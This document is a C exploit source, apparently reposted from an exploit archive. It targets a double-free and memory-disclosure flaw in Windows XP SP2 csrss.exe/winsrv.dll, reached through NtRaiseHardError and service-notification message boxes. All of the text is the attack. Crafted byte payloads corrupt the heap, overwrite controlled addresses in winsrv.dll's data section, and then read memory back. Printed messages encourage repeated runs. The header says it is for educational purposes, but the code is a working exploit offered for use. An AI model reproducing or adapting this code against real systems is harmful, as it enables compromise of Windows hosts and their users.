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MS Windows NtRaiseHardError Csrss.exe-winsrv.dll Double Free
============================================================ MS Windows NtRaiseHardError Csrss.exe-winsrv.dll Double Free ============================================================ ///////////////////////////////////////// ///////////////////////////////////////// ///// Microsoft Windows NtRaiseHardError ///// Csrss.exe-winsrv.dll Double Free ///////////////////////////////////////// ///// Ruben Santamarta ///// ruben at reversemode dot com ///// www.reversemode.com ///////////////////////////////////////// ///// 12.29.2006 ///// For educational purposes ONLY ///// Compiled using gcc (Dev-C++) //////////////////////////////////////// ////// XP SP2 //////////////////////////////////////// #include <stdio.h> #include <windows.h> #include <winbase.h> #include <ntsecapi.h> #define UNICODE #define MAGIC_VALUE 0x75b4cd40 // winsrv.dll data section BOOL gFon=FALSE; typedef LONG NTSTATUS; typedef NTSTATUS (WINAPI *PNTRAISE)(NTSTATUS, ULONG, ULONG, PULONG, UINT, PULONG); // Csrss.exe memory monitor thread // (Read csrss.exe memory disclosure exploit for details) VOID WINAPI ReadBox2( LPVOID param ) { HWND hWindow,hButton,hText; DWORD hChunk,cHeader=0; int i=0,b=0; int gTemp; char lpTitle[300]; char lpText[300]; char lpBuff[500]; ZeroMemory((LPVOID)lpTitle,250); ZeroMemory((LPVOID)lpText,250); ZeroMemory((LPVOID)lpBuff,300); Sleep(2000); for (;;) { lpText[0]=(BYTE)""; Sleep(1000); hWindow = FindWindow("#32770",NULL); ZeroMemory((LPVOID)lpTitle,250); ZeroMemory((LPVOID)lpText,250); ZeroMemory((LPVOID)lpBuff,300); if(hWindow != NULL) { GetWindowText(hWindow,(LPSTR)&lpTitle,250); if(strcmp(lpTitle,"Aa")!=0) { hText=FindWindowEx(hWindow,0,"static",0); GetWindowText(hText,(LPSTR)&lpText,250); hText=GetNextWindow(hText,GW_HWNDNEXT); GetWindowText(hText,(LPSTR)&lpText,250); cHeader=*(DWORD*)lpText; if( cHeader!=0) { if(cHeader >0x100000 && cHeader<0x400000) { printf("\n**************************\n"); printf("Heap Chunk Found! Good Luck!\n"); printf("New Value: 0x%p",cHeader); printf("\n**************************\n"); } else { printf("\n****************************\n"); printf("winsrv.dll data overwritten! \n"); printf("New Value: 0x%p",cHeader); printf("\n****************************\n"); } } else { printf("\n****************************\n"); printf("nothing found! "); printf("\n****************************\n"); } cHeader=*(DWORD*)lpTitle; if( cHeader!=0) { if(cHeader >0x100000 && cHeader<0x400000) { printf("\n**************************\n"); printf("Heap Chunk Found! Good Luck!\n"); printf("New Value: 0x%p",cHeader); printf("\n**************************\n"); } else { printf("\n****************************\n"); printf("winsrv.dll data overwritten! \n"); printf("New Value: 0x%p",cHeader); printf("\n****************************\n"); } } else { printf("\n****************************\n"); printf("nothing found! "); printf("\n****************************\n"); } } SendMessage(hWindow,WM_CLOSE,0,0); ZeroMemory((LPVOID)lpTitle,250); ZeroMemory((LPVOID)lpText,250); ZeroMemory((LPVOID)lpBuff,300); } CloseHandle(hWindow); } } VOID WINAPI ReadBox( LPVOID param ) { HWND hWindow; for (;;) { Sleep(1000); if(!gFon) { hWindow = FindWindow("#32770",NULL); if(hWindow != NULL ) { SendMessage(hWindow,WM_CLOSE,0,0); } } } } int main() { UNICODE_STRING uStr={5,5,L"fun!"}; ULONG retValue,args[]={MAGIC_VALUE,MAGIC_VALUE,(ULONG)&uStr}; PNTRAISE NtRaiseHardError; DWORD dwThreadId; byte *ShellCode ="\x5C\x3F\x3F\x5C\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75" "\x40\xcd\xb4\x75\x40\xcd\xb4\x75"; int i=0; NtRaiseHardError=(PNTRAISE)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtRaiseHardError"); system("cls"); printf("##########################################\n"); printf("### Microsoft Windows NtRaiseHardError ###\n"); printf("### Csrss.exe-winsrv.dll Double-Free ###\n"); printf("## Ruben Santamarta www.reversemode.com ##\n"); printf("##########################################\n"); printf("## + Csrss.exe Double-Free Exploit ##\n"); printf("## + Csrss.exe Memory Disclosure Exploit##\n"); printf("##########################################\n"); printf("# XP SP 2 #\n"); printf("##########################################\n\n"); printf("\nThe exploit overwrites controlled addresses\n"); printf("in winsrv.dll data section within Csrss.exe\n\n"); CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)ReadBox, 0, 0, &dwThreadId); // Seeding the heap for(i=0;i<2;i++) MessageBoxA(0,"\x40\xcd\xb4\x75","\x40\xcd\xb4\x75", MB_SERVICE_NOTIFICATION); // Exploiting Csrss.exe Double-Free printf("[*] Stage 1 -= Hitting Heap =-\n\n") ; printf("[+] Corrupting the heap (11 attemps)\n\n"); for( i=0; i<11; i++) { printf("#%d... ",i+1); MessageBoxA(0, ShellCode,"A", MB_SERVICE_NOTIFICATION); } gFon=TRUE; printf("\n\n[*] Stage 2 -= Scanning winsrv.dll data section =-\n\n") ; Sleep(2000); CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)ReadBox2, 0, 0, NULL); args[0]-=0x20; // Exploiting Csrss.exe memory disclosure flaw for(i=0;i<0xF;i++) { args[0]+=4; printf("\n#%d Reading at : [0x%p]\n",i,args[0]); NtRaiseHardError(0x50000018,3,4,args,1,&retValue); } printf("\n[+] Exploit exiting\n\n"); printf("#############################################################\n"); printf("If you didn't find anything, run the exploit one more time!\n"); printf("If you find a heap chunk address, enjoy!\n"); printf("#############################################################\n"); } # 0day.today [2024-12-27] #